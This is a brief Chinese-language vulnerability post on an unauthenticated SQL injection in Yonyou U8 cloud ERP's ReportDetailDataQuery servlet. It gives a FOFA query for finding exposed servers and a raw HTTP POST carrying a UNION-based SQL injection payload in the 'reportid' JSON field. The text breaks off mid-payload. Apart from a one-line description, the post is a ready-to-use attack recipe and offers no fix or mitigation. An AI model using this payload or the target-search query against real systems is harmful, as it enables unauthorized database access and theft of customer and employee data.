产品简介
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。
漏洞描述
用友U8 cloud ReportDetailDataQuery 接口处存在sql注入漏洞,攻击者未经授权可以访问数据库中的数据,从而盗取用户数据,造成用户信息泄露。
fofa
app=“用友-U8-Cloud”
漏洞复现
POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.ReportDetailDataQuery HTTP/1.1
Content-Length: 354
Host:
Content-Type: application/json
Connection: close
{"reportid":"' UNION ALL SELECT NULL,CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113)+(CASE WHEN (SYSDATETIME()=SYSDATETIME()) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU